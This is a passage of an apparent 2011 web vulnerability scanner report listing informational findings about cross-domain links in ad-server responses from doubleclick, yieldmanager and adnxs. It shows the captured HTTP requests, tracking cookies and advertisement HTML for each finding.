User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 01 May 2011 23:34:26 GMT
Content-Length: 1180

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ads.bluelithium.com/clk?2,13%3B9696cce63f6aaabd%3B12fade8e939,0%3B%3B%3B4257954862,WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAOOnorS8BAAAAAAAAADY1OTczYzE2LTc0NGItMTFlMC1hMDlkLTAwMzA0OGQ2ZDJmZQA4nyoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,http://ad.doubleclick.net/click;h=v8/3afa/c/2c6/%2a/v;228460379;0-0;0;50166444;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...
23.6. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1304292783.275135? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 01 May 2011 23:33:30 GMT
Content-Length: 1041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*http://ad.doubleclick.net/click;h=v8/3afa/4/20d/%2a/h;234033313;1-0;0;57879586;238-150/30;39925623/39943410/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/welcome/whychooseetrade?SC=S047401&ch_id=D&s_id=YHOO&c_id=LGSTDBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_LogoTextPO_No_150x30.gif" border=0 alt="Advertisement"></a>
...[SNIP]...
23.7. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:25:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8795

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Apr 29 11:56:20 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
wPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3Dhttp%3a%2f%2fwww.tdameritrade.com/offer/250freetrades/%3Fa%3DNVX%26o%3D199%26cid%3DGENRET%3B877237%3B62578498%3B239944784%3B41336049"><img src="http://s0.2mdn.net/1620481/td_ret250_fee_statement_160x600.gif" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://cdn.doubleverify.com/script308.js?agnc=930213&cmp=5414127&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62578498&advid=1620481&sid=877237&adid="></script>
...[SNIP]...
23.8. http://ad.doubleclick.net/adj/wpni.jobs/front  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wpni.jobs/front;sz=160x600,300x250,300x600,336x850;pos=ad6;poe=yes;ad=ss;ad=bb;ad=hp;del=js;ajax=n;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=3;ord=29166153864935040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 01 May 2011 23:33:37 GMT
Expires: Sun, 01 May 2011 23:38:37 GMT
Content-Length: 416

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afa/0/0/%2a/k;240270553;0-0;0;5742660;10408-336/850;41834567/41852354/1;;~okv=;sz=160x600,300x250,300x600,336x850;pos=ad6;poe=yes;ad=ss;ad=bb;ad=hp;del=js;ajax=n;heavy=y;pageId=wpni-wl-jobs-home;~aopt=2/1/ff/1;~sscs=%3fhttp://iedm.cua.edu/"><img src="http://s0.2mdn.net/viewad/409205/final_WP2_v2.gif" border=0 alt="Click here!"></a>
...[SNIP]...
23.9. http://ad.doubleclick.net/adj/wpni.jobs/front  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wpni.jobs/front;sz=150x60;pos=150x60;poe=yes;ad=150x60;del=js;ajax=n;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=2;ord=29166153864935040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 01 May 2011 23:33:34 GMT
Expires: Sun, 01 May 2011 23:38:34 GMT
Content-Length: 350

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afa/0/0/%2a/u;44306;0-0;0;5742660;135-150/60;0/0/0;;~okv=;sz=150x60;pos=150x60;poe=yes;ad=150x60;del=js;ajax=n;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;~aopt=2/1/ff/1;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here!"></a>
...[SNIP]...
23.10. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$-!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu~~!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:09 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0418.2rm.ac4
Set-Cookie: ih="b!!!!3!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!#<xjve!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: vuday1=Ajz6%!?-x!@eJsf; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<y+o`M.jTN!!L7_!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<yi^'M.jTN"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=t07yR!?-x!TDjBo; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:34:09 GMT
Pragma: no-cache
Content-Length: 1185
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(5589522);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?2,13%3B19a34308c4f95403%3B12fade9770a,0%3B%3B%3B3981257725,WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAACXfprS8BAAAAAAAAADY1OTczYzE2LTc0NGItMTFlMC1hMDlkLTAwMzA0OGQ2ZDJmZQA4nyoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,;ord=1304292849?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></iframe>
...[SNIP]...
23.11. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
